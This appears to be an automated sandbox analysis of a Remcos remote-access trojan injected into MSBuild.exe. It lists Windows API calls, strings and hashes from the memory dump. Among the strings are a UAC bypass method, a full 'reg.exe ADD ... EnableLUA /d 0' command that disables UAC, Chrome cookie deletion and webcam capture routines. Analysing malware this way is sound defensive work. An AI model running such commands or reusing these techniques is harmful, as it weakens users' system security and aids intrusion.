                                            • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                          • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCurrentOpenProcessQueryValue
                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 1866151309-2070987746
                                          • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                          • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                          • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                          • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                          • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                          • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                          • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                          • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 004075D0
                                            • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                            • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                          • CoUninitialize.OLE32 ref: 00407629
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeObjectUninitialize_wcslen
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                          • API String ID: 3851391207-1840432179
                                          • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                          • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                          • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                          • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                          • GetLastError.KERNEL32 ref: 0040BAE7
                                          Strings
                                          • [Chrome Cookies not found], xrefs: 0040BB01
                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                          • UserProfile, xrefs: 0040BAAD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 2018770650-304995407
                                          • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                          • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                          • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                          • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                          APIs
                                          • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AllocOutputShowWindow
                                          • String ID: Remcos v$5.1.0 Pro$CONOUT$
                                          • API String ID: 2425139147-1043272453
                                          • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                          • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                          • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                          • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                          • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$PkGNG$mscoree.dll
                                          • API String ID: 4061214504-213444651
                                          • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                          • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                          • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                          • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                          APIs
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                          • Sleep.KERNEL32(00002710), ref: 0041AE07
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm triggered$`#v
                                          • API String ID: 614609389-3049340936
                                          • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                          • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                          • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                          • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                          APIs
                                          • __allrem.LIBCMT ref: 0043AC69
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                          • __allrem.LIBCMT ref: 0043AC9C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                          • __allrem.LIBCMT ref: 0043ACD1
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                          • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                          • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                          • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                          APIs
                                          • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleep
                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                          • API String ID: 3469354165-3054508432
                                          • Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                          • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                          • Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                          • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                          • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                          • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                          • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID:
                                          • API String ID: 493672254-0
                                          • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                          • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                          • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                          • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID: PkGNG
                                          • API String ID: 1036877536-263838557
                                          • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                          • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                          • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                          • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                          APIs
                                          • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                          • _free.LIBCMT ref: 0044824C
                                          • _free.LIBCMT ref: 00448274
                                          • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                          • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                          • _abort.LIBCMT ref: 00448293
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                          • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                          • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                          • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                          • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                          • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                          • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                          • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                          • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                          • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                          • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                          • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                          • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: PkGNG
                                          • API String ID: 0-263838557
                                          • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                          • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                          • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                          • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                          • CloseHandle.KERNEL32(?), ref: 00404DDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                          • String ID: PkGNG
                                          • API String ID: 3360349984-263838557
                                          • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                          • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                          • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                          • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                          • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSizeSleep
                                          • String ID: XQG
                                          • API String ID: 1958988193-3606453820
                                          • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                          • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                          • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                          • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                          APIs
                                          • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                          • GetLastError.KERNEL32 ref: 0041D580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                          • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                          • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                          • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                          • CloseHandle.KERNEL32(?), ref: 004077AA
                                          • CloseHandle.KERNEL32(?), ref: 004077AF
                                          Strings
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                          • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                          • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                          • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                          • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                          Strings
                                          • SG, xrefs: 004076DA
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 004076C4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          • API String ID: 0-3927007821
                                          • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                          • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                          • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                          • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                          • SetEvent.KERNEL32(?), ref: 0040512C
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: KeepAlive | Disabled
                                          • API String ID: 2993684571-305739064
                                          • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                          • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
